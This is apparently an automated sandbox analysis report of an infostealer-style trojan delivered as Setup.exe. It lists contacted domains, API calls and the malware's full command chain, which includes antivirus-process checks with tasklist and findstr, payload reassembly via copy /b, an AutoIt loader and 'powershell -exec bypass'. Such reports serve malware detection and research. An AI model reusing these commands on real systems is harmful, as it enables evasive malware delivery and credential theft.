Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://quantitypitt.click/api
Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://quantitypitt.click/apik
Source: Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://quantitypitt.click:443/api
Source: Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://quantitypitt.click:443/apiK
Source: Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://quantitypitt.click:443/apiicrosoft
Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: powershell.exe, 00000010.00000002.2797712554.0000000004B01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landinghZ
Source: powershell.exe, 00000010.00000002.2796253872.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.000000000094B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796883993.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank
Source: powershell.exe, 00000010.00000002.2796376802.0000000000980000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landingmance
Source: powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phish
Source: powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishhZ
Source: powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-atX)
Source: powershell.exe, 00000010.00000002.2797712554.0000000004B01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: powershell.exe, 00000010.00000002.2796253872.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.000000000094B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796883993.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c
Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Designing.com.2.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Setup.exe String found in binary or memory: https://www.ssl.com/repository0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49794 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.191.144:443 -> 192.168.2.5:49846 version: TLS 1.2
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050F9
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E1F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 12_2_00E1F7C7
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E1F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 12_2_00E1F55C
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044D1
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E39FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 12_2_00E39FD2
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E14763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle, 12_2_00E14763
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E01B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 12_2_00E01B4D
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E0F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 12_2_00E0F20D
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Windows\SalvadorJs Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Windows\LikedBlackberry Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Windows\WallEnds Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Windows\HornUsed Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_0040737E 0_2_0040737E
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406EFE 0_2_00406EFE
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004079A2 0_2_004079A2
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004049A8 0_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC8017 12_2_00DC8017
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DAE1F0 12_2_00DAE1F0
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DBE144 12_2_00DBE144
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DA22AD 12_2_00DA22AD
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC22A2 12_2_00DC22A2
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DDA26E 12_2_00DDA26E
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DBC624 12_2_00DBC624
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E2C8A4 12_2_00E2C8A4
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DDE87F 12_2_00DDE87F
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DD6ADE 12_2_00DD6ADE
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E12A05 12_2_00E12A05
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E08BFF 12_2_00E08BFF
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DBCD7A 12_2_00DBCD7A
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DCCE10 12_2_00DCCE10
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DD7159 12_2_00DD7159
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DA9240 12_2_00DA9240
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E35311 12_2_00E35311
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DA96E0 12_2_00DA96E0
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC1704 12_2_00DC1704
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC1A76 12_2_00DC1A76
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC7B8B 12_2_00DC7B8B
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DA9B60 12_2_00DA9B60
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC7DBA 12_2_00DC7DBA
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC1D20 12_2_00DC1D20
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC1FE7 12_2_00DC1FE7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_047915AD 16_2_047915AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_04791653 16_2_04791653
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\124531\Designing.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: String function: 00DC0DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: String function: 00DBFD52 appears 40 times
Source: C:\Users\user\Desktop\Setup.exe Code function: String function: 004062CF appears 58 times
Source: Setup.exe Static PE information: invalid certificate
Source: Setup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Process created: Commandline size = 4588
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Process created: Commandline size = 4588 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@27/26@4/3
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E141FA GetLastError,FormatMessageW, 12_2_00E141FA
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E02010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 12_2_00E02010
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E01A0B AdjustTokenPrivileges,CloseHandle, 12_2_00E01A0B
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044D1
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E0DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 12_2_00E0DD87
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E13A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 12_2_00E13A0E
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsj4CF9.tmp Jump to behavior
Source: Setup.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\Setup.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Designing.com, 0000000C.00000003.2512726298.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2512632876.00000000042BF000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2487418039.00000000042C1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Setup.exe Virustotal: Detection: 7%
Source: C:\Users\user\Desktop\Setup.exe File read: C:\Users\user\Desktop\Setup.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 124531
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Lt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Heater" Lance
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French + ..\Selected + ..\Hormone + ..\Rough z
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\124531\Designing.com Designing.com z
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 124531 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Lt Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Heater" Lance Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French + ..\Selected + ..\Hormone + ..\Rough z Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\124531\Designing.com Designing.com z Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> < Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Section loaded: urlmon.dll Jump to behavior
